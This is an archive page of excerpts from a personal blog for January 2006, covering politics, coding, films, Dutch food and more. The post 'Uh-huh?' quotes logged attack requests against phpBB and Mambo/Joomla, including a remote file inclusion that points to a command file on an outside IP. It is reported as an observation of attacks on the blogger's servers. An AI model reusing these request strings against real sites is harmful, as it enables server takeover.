Monthly Archives: January 2006

So, what about those pillars?

I was going to add a quick drawing of the three pillars of democracy and end up with a rant about politics, but, for that, I should point you to the more politically gifted. I prefer to have strict separation … Continue reading

Posted in Truro NS | Comments Off on So, what about those pillars?

A thread revisited

Reminder to self: don’t call the main thread without ‘synchronizing’ it. Earlier and much earlier.

Posted in Haiku | Comments Off on A thread revisited

0 ≠ 1

It’s 27 years ago, Pol Pot’s Red Khmer’s grip on Cambodia ended with the fall of Phnom Phen. If you’re not familiar with the Red Khmer, you were probably born in the Eighties (or you weren’t watching the news): under … Continue reading

Posted in Hyperlinks | Comments Off on 0 ≠ 1

New Tricks

Last night, while mindlessly switching channels, I ended up at the PBS (the US Public Broadcasting channel). The channel was showing a British series called ‘New Tricks’. If I’m not wrong, what I was watching may have been the very … Continue reading

Posted in The Chest Desire | Comments Off on New Tricks

Fish!

The discussion on the blogosphere (‘do links subvert hierarchies’, summarized over at Burningbird) reminds me of the social behaviour of the African cichlid fish. These fish are particularly of interest for science because they are the most spectacular example of … Continue reading

Posted in Scientifically | Comments Off on Fish!

I have this…

After a heated discussion with Alfons, I ended up craving these classical examples of genuine Dutch cuisine. 1. Frikandellen: a long shaped snack, made out of mix of meat (minced and ground). Urban myths tell stories that frikandellen contain ‘left … Continue reading

Posted in Truro NS | 2 Comments

Packed with nothingness.

I noticed that Google is venturing in software bundling: here comes Google Pack. It’s a bundle of software produced by Google (like the Toolbar and Picasa), plus 3-rd party software like, Adobe Reader and Adaware. I think I just missed … Continue reading

Posted in Hyperlinks | Comments Off on Packed with nothingness.

I’ve got thread

A threaded query finally is working to run in the background. Update: Previously

Posted in Ordinateurs, SQL | Comments Off on I’ve got thread

guyly

guylyadv 1.To behave like a real, down-to-earth man. ex – The Prime Minister guyly drank a pint of beer with fellow citizens 2. To behave manly or pretend to be (physically) strong for the sake of mocking a situation, ex … Continue reading

Posted in Neologic | 2 Comments

Uh-huh?

From multiple servers, (medium) cross-site scripting attacks on what it looks like phpbb and (either) MamboServer and/or Joomla. Fragments follow: [snippet]admin_styles.phpadmin_styles.php? phpbb_root_path= http://209.136.48.69/cmd.dat [snippet]GET /mambo/index2.php?_REQUEST[option]= com_content&_REQUEST[Itemid]=1 (over mosConfig, it seems like) Not sure if they’re related to older security fixes, … Continue reading

Posted in Ordinateurs | Comments Off on Uh-huh?

If winds could change directions

Then people can do too! But wait: I’m not stunned by Russell’s decision to switch from Mac to Windows. I’m not particularly stunned, because this comes from the same guy who switches forth and back to any existing OS. Hey, … Continue reading

Posted in Ordinateurs | Comments Off on If winds could change directions

Dark Water (and the kamikaze fly)

Hello 2006! Goodbye 2005! But not too fast: last night, we watched deux movies: Dark Water (2005) and Raiders Of The Lost Ark (1983). Dark Water (starring Jennifer Connelly) is an adaption of the Japanese movie ‘Honogurai Mizu No Soko … Continue reading

Posted in The Chest Desire | Comments Off on Dark Water (and the kamikaze fly)